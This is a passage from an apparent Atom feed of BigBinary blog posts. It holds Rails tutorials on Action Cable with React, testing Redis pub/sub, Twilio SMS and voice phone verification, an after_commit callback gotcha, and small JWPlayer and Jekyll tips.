//= require components</code></pre><p>Make sure your <code>app/assets/javascripts/application.js</code> looks like this:</p><pre><code class="language-javascript">//= require jquery
//= require jquery_ujs
//= require turbolinks
//= require react
//= require react_ujs
//= require components
//= require cable
//= require channels
//= require_tree .</code></pre><h2>Step 3 - Setup Action Cable to start listening to events</h2><p>We will be using ES6, so let's replace the file <code>app/assets/javascripts/channels/index.coffee</code> with <code>app/assets/javascripts/channels/index.es6</code> and add the following
code.</p><pre><code class="language-javascript">var App = {};
App.cable = Cable.createConsumer(&quot;ws://localhost:28080&quot;);</code></pre><p>Also remove the file <code>app/assets/javascripts/channels/comments.coffee</code>, which was used to set up the subscription. We will be doing this setup from our React component.</p><h2>Step 4 - Create CommentList React component</h2><p>Add the following code to <code>app/assets/javascripts/components/comments_list.js.jsx</code>.</p><pre><code class="language-javascript">var CommentList = React.createClass({
  getInitialState() {
    let message = JSON.parse(this.props.message);
    return { message: message };
  },

  render() {
    let comments = this.state.message.comments.map((comment) =&gt; {
      return this.renderComment(comment);
    });
    return &lt;div&gt;{comments}&lt;/div&gt;;
  },

  renderComment(comment) {
    return (
      &lt;article key={comment.id}&gt;
        &lt;h3&gt;Comment by {comment.user.name}&lt;/h3&gt;
        &lt;p&gt;{comment.content}&lt;/p&gt;
      &lt;/article&gt;
    );
  },
});</code></pre><p>Here we have defined a simple component to display the list of comments associated with a message. The message and its comments are passed in as props.</p><h2>Step 5 - Create message JSON builder</h2><p>Next, we need to set up the data to be passed to the component.</p><p>Add the following code to <code>app/views/messages/_message.json.jbuilder</code>.</p><pre><code class="language-ruby">json.(message, :created_at, :updated_at, :title, :content, :id)
json.comments(message.comments) do |comment|
  json.extract! comment, :id, :content
  json.user do
    json.extract! comment.user, :id, :name
  end
end</code></pre><p>This JSON is what gets pushed to our <code>CommentList</code> component.</p><h2>Step 6 - Create Rails views to display the component</h2><p>We now need to set up our views to display the message and its comments.</p><p>We need a form to create new comments on messages. 
This already exists in <code>app/views/comments/_new.html.erb</code>, and we will use it as is.</p><pre><code class="language-erb">&lt;%= form_for [ message, Comment.new ], remote: true do |form| %&gt;
  &lt;%= form.text_area :content, size: '100x20' %&gt;&lt;br&gt;
  &lt;%= form.submit 'Post comment' %&gt;
&lt;% end %&gt;</code></pre><p>After a comment is created, the current form is replaced with a fresh one; the view <code>app/views/comments/create.js.erb</code> takes care of that. Appending the new comment to the page, however, will now be handled by our React component, so from <code>app/views/comments/create.js.erb</code> <em>delete</em> the line containing the following code:</p><pre><code class="language-erb">$('#comments').append('&lt;%=j render @comment %&gt;');</code></pre><p>We need to display the message details and render our component to display the comments. Insert the following code in <code>app/views/messages/show.html.erb</code> just before <code>&lt;%= render 'comments/comments', message: @message %&gt;</code>:</p><pre><code class="language-erb">&lt;%= react_component 'CommentList', message: render(partial: 'messages/message.json', locals: {message: @message}) %&gt;</code></pre><p>After inserting it, the view would look like this:</p><pre><code class="language-erb">&lt;h1&gt;&lt;%= @message.title %&gt;&lt;/h1&gt;
&lt;p&gt;&lt;%= @message.content %&gt;&lt;/p&gt;

&lt;%= react_component 'CommentList', message: render(partial: 'messages/message.json', locals: {message: @message}) %&gt;

&lt;%= render 'comments/new', message: @message %&gt;</code></pre><p>Notice how we are rendering <code>CommentList</code> based on the message JSON produced by the jbuilder view we created.</p><h2>Step 7 - Set up a subscription to listen to Action Cable from the React component</h2><p>To listen for new comments, we need to set up an Action Cable subscription.</p><p>Add the following code to the <code>CommentList</code> component.</p><pre><code class="language-javascript">setupSubscription() {
  App.comments = App.cable.subscriptions.create(&quot;CommentsChannel&quot;, {
    message_id: this.state.message.id,

    connected: function () {
      setTimeout(() =&gt; this.perform('follow',
                                    { message_id: this.message_id }), 1000);
    },

    received: function (data) {
      this.updateCommentList(data.comment);
    },

    updateCommentList: this.updateCommentList
  });
}</code></pre><p>We also need to set up the related Action Cable channel code on the Rails end.</p><p>Make sure the following code exists in <code>app/channels/comments_channel.rb</code>:</p><pre><code class="language-ruby">class CommentsChannel &lt; ApplicationCable::Channel
  def follow(data)
    stop_all_streams
    stream_from &quot;messages:#{data['message_id'].to_i}:comments&quot;
  end

  def unfollow
    stop_all_streams
  end
end</code></pre><p>In our React component, we use <code>App.cable.subscriptions.create</code> to create a new subscription for updates, passing the channel we want to listen to. It accepts the following callback hooks:</p><ul><li><p><code>connected</code>: The subscription was connected successfully. Here we use the <code>perform</code> method to call the related channel action and pass data to it: <code>perform('follow', { message_id: this.message_id })</code> calls <code>CommentsChannel#follow(data)</code>.</p></li><li><p><code>received</code>: We received a new data notification from Rails. 
Here we take action to update our component. We have passed <code>updateCommentList: this.updateCommentList</code>, a component method that is called with the data received from Rails.</p></li></ul><h3>Complete React component</h3><p>Here's how our complete component looks:</p><pre><code class="language-javascript">var CommentList = React.createClass({
  getInitialState() {
    let message = JSON.parse(this.props.message);
    return { message: message };
  },

  render() {
    let comments = this.state.message.comments.map((comment) =&gt; {
      return this.renderComment(comment);
    });
    return &lt;div&gt;{comments}&lt;/div&gt;;
  },

  renderComment(comment) {
    return (
      &lt;article key={comment.id}&gt;
        &lt;h3&gt;Comment by {comment.user.name}&lt;/h3&gt;
        &lt;p&gt;{comment.content}&lt;/p&gt;
      &lt;/article&gt;
    );
  },

  componentDidMount() {
    this.setupSubscription();
  },

  updateCommentList(comment) {
    let message = JSON.parse(comment);
    this.setState({ message: message });
  },

  setupSubscription() {
    App.comments = App.cable.subscriptions.create(&quot;CommentsChannel&quot;, {
      message_id: this.state.message.id,

      connected: function () {
        // The timeout here is needed to make sure the subscription
        // is set up properly before we perform any actions.
        setTimeout(
          () =&gt; this.perform(&quot;follow&quot;, { message_id: this.message_id }),
          1000
        );
      },

      received: function (data) {
        this.updateCommentList(data.comment);
      },

      updateCommentList: this.updateCommentList,
    });
  },
});</code></pre><h2>Step 8 - Broadcast a message when a new comment is created</h2><p>Our final piece is to broadcast updates to the message to the listeners that have subscribed to the channel.</p><p>Add the following code to <code>app/jobs/message_relay_job.rb</code>:</p><pre><code class="language-ruby">class MessageRelayJob &lt; ApplicationJob
  def perform(message)
    comment = MessagesController.render(partial: 'messages/message',
                                        locals: { message: message })
    ActionCable.server.broadcast &quot;messages:#{message.id}:comments&quot;,
                                 comment: comment
  end
end</code></pre><p>This job is then called from the <code>Comment</code> model. Add this line to <code>app/models/comment.rb</code>:</p><pre><code class="language-ruby">after_commit { MessageRelayJob.perform_later(self.message) }</code></pre><p>We are using a message relay here, so we can get rid of the existing comment relay file, <code>app/jobs/comment_relay_job.rb</code>. We will also remove the reference to <code>CommentRelayJob</code> from the <code>Comment</code> model, since <code>after_commit</code> now calls <code>MessageRelayJob</code>.</p><h2>Summary</h2><p>Hopefully we have shown that Action Cable is going to be a good friend of ReactJS in the future. Only time will tell.</p><p>The complete working example for Action Cable + ReactJS can be found <a href="https://github.com/vipulnsward/actioncable-examples/tree/es6">here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Verifying PubSub Services from Rails using Redis]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/verifying-pubsub-services-from-rails-redis"/>
      <updated>2015-05-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/verifying-pubsub-services-from-rails-redis</id>
      <content type="html"><![CDATA[<p>Let's say that we have a Service that reads and writes to Redis.We have <code>BaseRedisService</code> for managing connection,<code>RedisWriterService</code> to write to Redis and<code>RedisReaderService</code> to read from Redis.</p><pre><code class="language-ruby">require 'redis'# Base class to manage connectionclass BaseRedisService REDIS_HOST = '127.0.0.1' def connection   if !(defined?(@@connection) &amp;&amp; @@connection)     @@connection =  Redis.new({ host: REDIS_HOST })   end   @@connection endend</code></pre><pre><code class="language-ruby"># Class to write to Redisclass RedisWriterService &lt;  BaseRedisService attr_reader :key, :value def initialize key, value   @key, @value = key, value end def process   connection.set key, value endend</code></pre><pre><code class="language-ruby"># Class to read from Redisclass RedisReaderService &lt; BaseRedisServiceattr_reader :keydef initialize key  @key = keyenddef process  connection.get keyendend</code></pre><p>A test for the above mentioned case might look like this.</p><pre><code class="language-ruby">require 'test_helper'class RedisPubSubServiceTest &lt; ActiveSupport::TestCasedef test_writing_and_reading_value_using_redis  value = 'Vipul A M'  RedisWriterService.new('name', value).process  assert_equal value, RedisReaderService.new('name').processendend</code></pre><p>But now, we need to add PubSub to the service and verify thatthe service sends proper messages to Redis.For verifying from such a service, the service would need to <code>listen</code> to messages sent to Redis.Problem is that Redis <code>listens</code> in a loop. 
We would need to explicitly release control from <code>listening</code> and allow our tests to go ahead and verify a scenario.</p><p>Let's look at how these services would look.</p><pre><code class="language-ruby">class RedisPublisherService &lt; BaseRedisService
  attr_reader :options, :channel

  def initialize channel, options
    @channel = channel
    @options = options
  end

  def process
    connection.publish(channel, options)
  end
end</code></pre><p>and our <code>Subscriber</code> looks like this.</p><pre><code class="language-ruby">class RedisSubscriberService &lt; BaseRedisService
  attr_reader :channel

  def initialize channel
    @channel = channel
  end

  def process
    connection.subscribe(channel) do |on|
      on.message do |channel, message|
        puts message
      end
    end
  end
end</code></pre><p>Notice that we don't have an easy way to return a value from the loop. Right now we just print each message as it is received.</p><p>Now, let's start persisting the messages to an array in our service. We will also expose this array through a thread variable so that it can be accessed from outside the execution of the <code>listen</code> loop.</p><pre><code class="language-ruby">class RedisSubscriberService &lt; BaseRedisService
  attr_reader :channel, :messages, :messages_count

  def initialize channel, messages_count = 5
    @channel        = channel
    @messages       = []
    @messages_count = messages_count
  end

  def process
    connection.subscribe(channel) do |on|
      on.message do |channel, message|
        messages.unshift message
        Thread.current[:messages] = messages
      end
    end
  end
end</code></pre><p>We now have a way to access the message state of the service and read any messages received by it. Say we start a new <code>RedisSubscriberService</code> in a <code>Thread</code>; we could then read messages like this.</p><pre><code class="language-ruby">subscriber = Thread.new { RedisSubscriberService.new('payment_alerts').process }

# Print the first message from the messages received
puts subscriber[:messages].first</code></pre><p>Armed with this, we can now define a set of helpers to use in our Rails tests.</p><pre><code class="language-ruby">module SubscriberHelpers
  THREAD_PROCESS_TIMEOUT = 0.5

  def setup_subscriber channel = 'test_channel'
    @subscriber = Thread.new { RedisSubscriberService.new(channel).process }
  end

  def teardown_subscriber
    @subscriber.kill
  end

  def with_subscriber
    yield
    @subscriber.join THREAD_PROCESS_TIMEOUT
  end

  def message_from_subscription
    @subscriber[:messages].first
  end
end</code></pre><p>Notice the <code>with_subscriber</code> method. It executes the block passed to it, then yields control to the subscriber thread so that any messages sent can be read and stored in the messages store.</p><p>The value of <code>THREAD_PROCESS_TIMEOUT</code> can be tuned to suit the system being verified.</p><p>In our tests, we can now verify <code>PubSub</code> as follows.</p><pre><code class="language-ruby">require 'test_helper'

class RedisPubSubServiceTest &lt; ActiveSupport::TestCase
  include SubscriberHelpers

  def setup
    setup_subscriber
  end

  def teardown
    teardown_subscriber
  end

  def test_writing_and_reading_back_values_from_pub_sub
    value = 'Vipul A M'

    with_subscriber do
      RedisPublisherService.new('test_channel', value).process
    end

    assert_equal value, message_from_subscription
  end
end</code></pre><h2>Summary</h2><p>We took a look at how pub/sub based services can be verified by using threads and exposing messages from them. These helpers can be tailored to any similar <code>PubSub</code> service like Redis, and make it easy to verify values published from our services in Rails tests.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Voice based phone verification using twilio]]></title>
       <author><name>Santosh Wadghule</name></author>
      <link href="https://www.bigbinary.com/blog/voice-based-phone-verification-using-twilio"/>
      <updated>2015-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/voice-based-phone-verification-using-twilio</id>
      <content type="html"><![CDATA[<p>In my previous <a href="phone-verification-using-twilio">blog post</a>,I talked about how to do phone verification using <strong>SMS</strong> and now in this blog post I'm going to talkabout how to do <strong>voice</strong> based phone verification using <a href="https://github.com/twilio/twilio-ruby">Twilio</a>.</p><h2>Requirement</h2><p>Let's change the requirement a bit this time.</p><ul><li>After the user signs up, send an SMS verification.If SMS verification goes well then use that phone number for future use.</li><li>But if the user's phone number doesn't support the SMS feature, then call on user'sphone number for the verification.</li><li>In the call, ask the user to press <strong>1</strong> from keypad to complete the verification.If that user presses the <strong>1</strong> key, then mark the phone number as verified.</li></ul><h2>Step 1: Make a call for phone verification</h2><p>We already handled SMS verification, so let's add call related changes in<code>PhoneVerificationService</code> class.</p><pre><code class="language-ruby">class PhoneVerificationService  attr_reader :user, :verification_through  VERIFICATION_THROUGH_SMS  = :sms  VERIFICATION_THROUGH_CALL = :call  def initialize options    @user                 = User.find(options[:user_id])    @verification_through = options[:verification_through] || VERIFICATION_THROUGH_SMS  end  def process    if verification_through == VERIFICATION_THROUGH_SMS      perform_sms_verification    else      make_call    end  end  private  def from    #phone number given by twilio    Settings.twilio_number_for_app  end  def to    &quot;+1#{user.phone_number}&quot;  end  def body    &quot;Please reply with this code '#{user.phone_verification_code}'&quot; &lt;&lt;    &quot;to verify your phone number&quot;  end  def send_sms    Rails.logger.info &quot;SMS: From: #{from} To: #{to} Body: \&quot;#{body}\&quot;&quot;    twilio_client.account.messages.create ( from: from, to: to, body: 
body)  end  def make_call    Rails.logger.info &quot;Call: From: #{from} To: #{to}&quot;    twilio_client.account.calls.create( from: from, to: to, url: callback_url)  end  def perform_sms_verification    begin      send_sms    rescue Twilio::REST::RequestError =&gt; e      return make_call if e.message.include?('is not a mobile number')      raise e.message    end  end  def callback_url    Rails.application.routes.url_helpers      .phone_verifications_voice_url(host: Settings.app_host,                                     verification_code: user.phone_verification_code)  end  def twilio_client    @twilio ||= Twilio::REST::Client.new(Settings.twilio_account_sid,                                         Settings.twilio_auth_token)  endend</code></pre><p>In <code>PhoneVerificationService</code> class we have added some major changes:</p><ol><li>We have defined one more attribute reader <code>verification_through</code> and in <code>initialize</code> methodwe have set it.</li><li>We have created two new constants <code>VERIFICATION_THROUGH_SMS</code> &amp; <code>VERIFICATION_THROUGH_CALL</code>.</li><li>We have changed <code>process</code> method and now we check which verification process shouldbe taken place based on <code>verification_through</code> attribute.</li><li>We also have added new methods <code>perform_sms_verification</code>, <code>make_call</code> and <code>callback_url</code>.</li></ol><p>Let's go through these newly added methods.</p><h2>perform_sms_verification:</h2><p>In this method, first we try to send an SMS verification. If SMS verificationfails with error message like <strong><em>'is not a mobile number'</em></strong> then inthe rescue block, we make a phone verification call or we raise the error.</p><h2>make_call:</h2><p>In this method, we create an actual phone call and pass the all required info totwilio client object.</p><h2>callback_url:</h2><p>In this method, we set the callback_url which isrequired for Twilio for making a call. 
When we call the user for verification, our app needs to behave like a human and ask the user to press 1 to complete the verification, i.e. in the form of <a href="http://www.twilio.com/docs/api/twiml/">TwiML</a>. This <code>callback_url</code> needs to be set up in our app.</p><h2>Step 2: Add voice action in phone verification controller</h2><p>For the <code>callback_url</code>, add a route for the <code>voice</code> action in <code>config/routes.rb</code>:</p><pre><code class="language-plaintext">post 'phone_verifications/voice' =&gt; 'phone_verifications#voice'</code></pre><p>Add the <code>voice</code> action and the code it requires in <code>PhoneVerificationsController</code>.</p><pre><code class="language-ruby">class PhoneVerificationsController &lt; ApplicationController
  skip_before_filter :verify_authenticity_token
  after_filter :set_header

  HUMAN_VOICE = 'alice'

  def voice
    verification_code = params[:verification_code]

    response = Twilio::TwiML::Response.new do |r|
      r.Gather numDigits: '1',
               action: &quot;/phone_verifications/verify_from_voice?verification_code=#{verification_code}&quot;,
               method: 'post' do |g|
        g.Say 'Press 1 to verify your phone number.', voice: HUMAN_VOICE
      end
    end

    render_twiml response
  end

  def verify_from_message
    user = get_user_for_phone_verification
    user.mark_phone_as_verified! if user

    render nothing: true
  end

  private

  def get_user_for_phone_verification
    phone_verification_code = params['Body'].try(:strip)
    phone_number            = params['From'].gsub('+1', '')

    condition = { phone_verification_code: phone_verification_code,
                  phone_number: phone_number }

    User.unverified_phones.where(condition).first
  end

  def set_header
    response.headers[&quot;Content-Type&quot;] = &quot;text/xml&quot;
  end

  def render_twiml(response)
    render text: response.text
  end
end</code></pre><p>In this <code>voice</code> method, we have set up the Twilio response. 
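For reference, the <code>Gather</code>/<code>Say</code> response built above serializes to TwiML roughly like this; a sketch, where the <code>verification_code</code> value is hypothetical:

```
&lt;Response&gt;
  &lt;Gather numDigits=&quot;1&quot; action=&quot;/phone_verifications/verify_from_voice?verification_code=abc123&quot; method=&quot;post&quot;&gt;
    &lt;Say voice=&quot;alice&quot;&gt;Press 1 to verify your phone number.&lt;/Say&gt;
  &lt;/Gather&gt;
&lt;/Response&gt;
```

Twilio reads this document and speaks the <code>Say</code> text, then posts the gathered digit to the <code>action</code> URL.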
When a call is made to the user, this response gets converted into a robotic human voice. The <code>render_twiml</code> method, which renders the Twilio response as text, is required by the Twilio APIs. The response header is set in the <code>set_header</code> method, which runs as an <code>after_filter</code>.</p><h2>Step 3: Set request URL for voice phone verification in Twilio</h2><p>In the <code>voice</code> action, we set the request URL in the <code>action</code> key of the Twilio response object; a request URL also needs to be set in your Twilio account. When the user replies to the call prompt, Twilio makes a request to our app and adds some of its own values as request parameters. Using those parameters, we handle the actual phone verification in the app.</p><p>Open your Twilio account and, under the <strong>NUMBERS</strong> section/tab, click on your Twilio number. Then, in the Voice section, add the request URL with the HTTP POST method, like this:</p><p><code>http://your.ngrok.com/phone_verifications/verify_from_voice/</code></p><p>We need <a href="https://ngrok.com">Ngrok</a> to expose the local URL to the outside world. Read more about it in my previous <a href="phone-verification-using-twilio">blog post</a>.</p><h2>Step 4: Add verify_from_voice action in phone verification controller</h2><p>First, add a route for this action in <code>config/routes.rb</code>:</p><pre><code class="language-plaintext">post &quot;phone_verifications/verify_from_voice&quot; =&gt; &quot;phone_verifications#verify_from_voice&quot;</code></pre><p>Add this method to your <code>PhoneVerificationsController</code>.</p><pre><code class="language-ruby">  def verify_from_voice
    response = Twilio::TwiML::Response.new do |r|
      if params['Digits'] == &quot;1&quot;
        user = get_user_for_phone_verification
        user.mark_phone_as_verified!

        r.Say 'Thank you. Your phone number has been verified successfully.',
              voice: HUMAN_VOICE
      else
        r.Say 'Sorry. Your phone number has not been verified.',
              voice: HUMAN_VOICE
      end
    end

    render_twiml response
  end</code></pre><p>Modify the private method <code>get_user_for_phone_verification</code> in <code>PhoneVerificationsController</code> to support voice verification.</p><pre><code class="language-ruby">  def get_user_for_phone_verification
    if params['Called'].present?
      phone_verification_code = params['verification_code']
      phone_number            = params['To']
    else
      phone_verification_code = params['Body'].try(:strip)
      phone_number            = params['From']
    end

    condition = { phone_verification_code: phone_verification_code,
                  phone_number: phone_number.gsub('+1', '') }

    User.unverified_phones.where(condition).first
  end</code></pre><p>In the <code>verify_from_voice</code> method, we get the <code>Digits</code>, <code>To</code> &amp; <code>verification_code</code> parameters from the Twilio request. Using these, we search for the user in the database. If we find the right user, we mark the user's phone number as verified.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Gotcha with after_commit callback in Rails]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/gotcha-with-after_commit-callback-in-rails"/>
      <updated>2015-03-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/gotcha-with-after_commit-callback-in-rails</id>
      <content type="html"><![CDATA[<p><code>after_commit</code> callback in Rails is triggeredafter the end of transaction.</p><p>For eg. I have a Post modelfor whichthe number of linesof the contentare calculated in the <code>after_commit</code> callback:</p><pre><code class="language-ruby">class Post &lt; ActiveRecord::Base  after_commit :calculate_total_lines, if: -&gt; (post) { post.previous_changes.include?(:content) }  def calculate_total_lines    update! total_lines: content.split(&quot;\n&quot;).length  endend</code></pre><pre><code class="language-ruby">post = Post.create! content: &quot;Lets discuss Rails 5.\n&quot;, author: 'Prathamesh'assert_equal 1, post.total_lines</code></pre><p>Now lets wrap the creation of post inside a transaction block:</p><pre><code class="language-ruby">Post.transaction do  post = Post.create! content: &quot;Lets discuss Rails 5.\n&quot;, author: 'Prathamesh'  assert_equal 1, post.total_linesend</code></pre><p>The test will fail now.</p><pre><code class="language-ruby">#   1) Failure:# BugTest#test_within_transaction [after_commit_test.rb:45]:# Expected: 1#   Actual: nil</code></pre><p>Why? Lets recall. <code>after_commit</code> callback will get executedafter the end of transaction.</p><p>So until all the code inside transaction is completed,the callback is not going to get executed.</p><p>Here is a <a href="https://gist.github.com/prathamesh-sonpatki/69b00155d3990e3e507e">gist</a>with complete test.</p><p>Next time you are using an <code>after_commit</code> callback and a <code>transaction</code>,make sure that code inside the transaction is not dependent on theresult of the callback.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Blue border around JWPLAYER video]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/blue-border-around-jwplayer-video"/>
      <updated>2015-02-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/blue-border-around-jwplayer-video</id>
      <content type="html"><![CDATA[<p>Latest versions of JWPlayer(6.9 onwards)adds blue border around the videowhen it is in focus.</p><p>This is because of the CSS class <code>jwplayer-tab-focus</code>.</p><p>The blue borderaround currently selected videoallows to identifywhich instance of JWPlayer is in focus.</p><p>But with a single JWPlayer instance, it can be annoying.</p><p>To remove this blue border,we can override the default JWPlayer CSS as follows.</p><pre><code class="language-css">.jw-tab-focus:focus {  outline: none;}</code></pre><p>To keep all the overridden CSS in once place,we can add this change in a separate file such as <code>jwplayer_overrides.css</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Phone verification using SMS via Twilio]]></title>
       <author><name>Santosh Wadghule</name></author>
      <link href="https://www.bigbinary.com/blog/phone-verification-using-twilio"/>
      <updated>2015-01-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/phone-verification-using-twilio</id>
      <content type="html"><![CDATA[<p>In this blog post, I'm going to show you how to do phone verification using SMS via Twilio.We will be using <a href="https://github.com/twilio/twilio-ruby">Twilio</a> gem.</p><h2>Requirement</h2><ul><li>When a user signs up , we want to send an SMS to that userwith a random string to verify user's phone number.</li><li>If that user replies back with that code, then verify user's phone numberin the app. Once the phone number is verified, then we can use that phone numberfor future use.</li></ul><h2>Step 1: Create required columns in users table</h2><p>Let's create <code>phone_number</code>, <code>phone_verification_code</code> and <code>phone_verified</code>columns in the users table.</p><pre><code class="language-plaintext"> $ bin/rails generate migration AddPhoneAttributesToUsers phone_number:string phone_verification_code:string phone_verified:boolean</code></pre><p>Then run the migration.</p><h2>Step 2: Add phone number field in registration form</h2><p>Add <code>phone_number</code> field in the registration form.</p><pre><code class="language-plaintext">  &lt;%= f.text_field :phone_number %&gt;</code></pre><h2>Step 3: Send an SMS with verification code</h2><p>When a user submits registration form, we need to send SMS ifphone number is present. To handle this, add following code in <code>User</code>model.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  scope :unverified_phones,  -&gt; { where(phone_verified: false) }  before_save :set_phone_attributes, if: :phone_verification_needed?  after_save :send_sms_for_phone_verification, if: :phone_verification_needed?  def mark_phone_as_verified!    
update!(phone_verified: true, phone_verification_code: nil)  end  private  def set_phone_attributes    self.phone_verified = false    self.phone_verification_code = generate_phone_verification_code    # removes all white spaces, hyphens, and parenthesis    self.phone_number.gsub!(/[\s\-\(\)]+/, '')  end  def send_sms_for_phone_verification    PhoneVerificationService.new(user_id: id).process  end  def generate_phone_verification_code    begin     verification_code = SecureRandom.hex(3)    end while self.class.exists?(phone_verification_code: verification_code)    verification_code  end  def phone_verification_needed?    phone_number.present? &amp;&amp; phone_number_changed?  endend</code></pre><p>We have added 2 major changes in the user model,</p><ul><li><code>set_phone_attributes</code> method is set in <code>before_save</code> callback.</li><li><code>send_sms_for_phone_verification</code> method is set in <code>after_save</code> callback.</li></ul><p>In <code>set_phone_attributes</code> method, we are setting up the phone attributes mainlysanitizing phone number and generating unique phone verification code. In<code>send_sms_for_phone_verification</code> method, we send SMS to the user. 
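The phone number sanitization above can be checked in isolation; a quick sketch in plain Ruby, where the input value is hypothetical:

```ruby
raw   = '(555) 123-4567'            # hypothetical user input
clean = raw.gsub(/[\s\-\(\)]+/, '') # same pattern as set_phone_attributes

clean # => "5551234567"
```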
Creation of the SMS for the phone verification message is handled in the <code>PhoneVerificationService</code> class.</p><pre><code class="language-ruby">class PhoneVerificationService
  attr_reader :user

  def initialize(options)
    @user = User.find(options[:user_id])
  end

  def process
    send_sms
  end

  private

  def from
    # Add your Twilio phone number (programmable phone number)
    Settings.twilio_number_for_app
  end

  def to
    # +1 is the country code for the USA
    &quot;+1#{user.phone_number}&quot;
  end

  def body
    &quot;Please reply with this code '#{user.phone_verification_code}' to
    verify your phone number&quot;
  end

  def twilio_client
    # Pass your Twilio account SID and auth token
    @twilio ||= Twilio::REST::Client.new(Settings.twilio_account_sid,
                                         Settings.twilio_auth_token)
  end

  def send_sms
    Rails.logger.info &quot;SMS: From: #{from} To: #{to} Body: \&quot;#{body}\&quot;&quot;
    twilio_client.account.messages.create(
      from: from,
      to: to,
      body: body
    )
  end
end</code></pre><p>In the <code>PhoneVerificationService</code> class, we have defined <code>user</code> as an attribute reader and set the user object in the <code>initialize</code> method. 
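As an aside, the verification code generated earlier by <code>generate_phone_verification_code</code> comes from <code>SecureRandom.hex(3)</code>, which encodes 3 random bytes as a 6-character hex string:

```ruby
require 'securerandom'

code = SecureRandom.hex(3) # e.g. "9f2b4c" (random each time)
code.length # => 6
```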
Now, if you look at the <code>process</code> method, it delegates the work to the methods below.</p><p>Let's go through each method.</p><ul><li><code>from</code> - In this method, we set the Twilio phone number, i.e. the programmable number.</li><li><code>to</code> - In this method, we set the phone number to which we want to send the SMS.</li><li><code>body</code> - In this method, we build the text message with the verification code.</li><li><code>twilio_client</code> - It creates the Twilio client from the Twilio account SID and auth token.</li><li><code>send_sms</code> - And last, it sends the SMS to the user.</li></ul><h2>Step 4: Set request URL for phone verification in Twilio</h2><p>As of now, the system can send an SMS to a user. Now we need to add the ability to receive the reply SMS and match the verification code.</p><p>First, we need to set up a request URL in the Twilio account.</p><p>Open your Twilio account and, under the <strong>NUMBERS</strong> section/tab, click on your Twilio number. Then, in the <strong>Messaging</strong> section, add the request URL with the <strong>HTTP POST</strong> method, like this:</p><pre><code class="language-plaintext">http://your.ngrok.com/phone_verifications/verify_from_message/</code></pre><p>But to make it work, our Rails app needs to be reachable from the public internet. There are two options for this:</p><ol><li>Deploy the Rails app to your VPS or PaaS of choice.</li><li>Use a tunneling service to take the server running on your development machine and make it available at an address on the public internet.</li></ol><p>I'm going to use the <a href="https://ngrok.com/">Ngrok</a> tunneling service for the purposes of this blog. You can check this <a href="https://www.twilio.com/blog/2013/10/test-your-webhooks-locally-with-ngrok.html">blog</a> for more about its usage.</p><h2>Step 5: Create phone verification controller</h2><p>We need one more controller, which will handle phone verification when the request comes from Twilio. 
When a user replies back with a verification code, it will trigger the request URL through the Twilio API. To handle that request, let's add the phone verifications controller.</p><pre><code class="language-plaintext">  $ bin/rails generate controller phone_verifications</code></pre><p>Add a new route in <code>config/routes.rb</code>.</p><pre><code class="language-plaintext">post &quot;phone_verifications/verify_from_message&quot; =&gt; &quot;phone_verifications#verify_from_message&quot;</code></pre><p>Add the following code to the <code>PhoneVerificationsController</code>.</p><pre><code class="language-ruby">class PhoneVerificationsController &lt; ApplicationController
  skip_before_action :verify_authenticity_token

  def verify_from_message
    user = get_user_for_phone_verification
    user.mark_phone_as_verified! if user
    render nothing: true
  end

  private

  def get_user_for_phone_verification
    phone_verification_code = params['Body'].try(:strip)
    phone_number            = params['From'].gsub('+1', '')
    condition = { phone_verification_code: phone_verification_code,
                  phone_number: phone_number }
    User.unverified_phones.where(condition).first
  end
end</code></pre><p>In this controller, we added <code>skip_before_action :verify_authenticity_token</code> because the request from Twilio comes from outside our Rails app and does not carry a CSRF token. This means we have disabled CSRF protection for this controller.</p><p>Now look at the <code>verify_from_message</code> method. In this method we take the phone verification code and the phone number from the params hash.
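</p><p>Concretely, suppose a user whose number is the (made-up) US number +15551234567 replies with &quot;8347&quot;. The normalization then works out like this standalone sketch (the params hash is illustrative of Twilio's webhook parameters):</p>

```ruby
# Illustrative params, shaped like Twilio's webhook POST:
# 'Body' is the reply text and 'From' is the sender in E.164 format.
params = { 'Body' => " 8347 ", 'From' => "+15551234567" }

phone_verification_code = params['Body'].strip # the controller's .try(:strip) also guards against a missing 'Body'
phone_number            = params['From'].gsub('+1', '')

phone_verification_code # => "8347"
phone_number            # => "5551234567"
```

<p>One design note: <code>gsub</code> replaces every occurrence of &quot;+1&quot;, while <code>sub('+1', '')</code> would target only the leading country code; since &quot;+&quot; appears just once in an E.164 number, the result is the same here.</p><p>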
Using that data, we find the user in the database. Once we get the user, we mark the user's phone number as verified.</p><p>Finally we are all set to send business-level text messages to the verified phone number.</p><p>This <a href="https://www.twilio.com/blog/2014/10/twilio-on-rails-part-2-rails-4-app-sending-sms-mms.html">blog</a> has more information about how to make secure Twilio requests.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Author information in jekyll blog]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/author-information-in-jekyll-blog"/>
      <updated>2015-01-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/author-information-in-jekyll-blog</id>
      <content type="html"><![CDATA[<p>BigBinary's <a href="https://bigbinary.com/blog">blog</a> is powered by <a href="http://jekyllrb.com">Jekyll</a>. In every blog we display the author's name, twitter handle, github id and avatar. In this blog I'm going to discuss how we collect all that information in a simple manner.</p><p>We create a directory called <strong>_data</strong> in the root folder. This directory has a single file called <strong>authors.yml</strong>, which in our case looks like this.</p><pre><code class="language-plaintext">vipulnsward:
  name: Vipul
  avatar: http://bigbinary.com/assets/team/vipul.jpg
  github: vipulnsward
  twitter: vipulnsward
neerajsingh0101:
  name: Neeraj Singh
  avatar: http://bigbinary.com/assets/team/neeraj.jpg
  github: neerajsingh0101
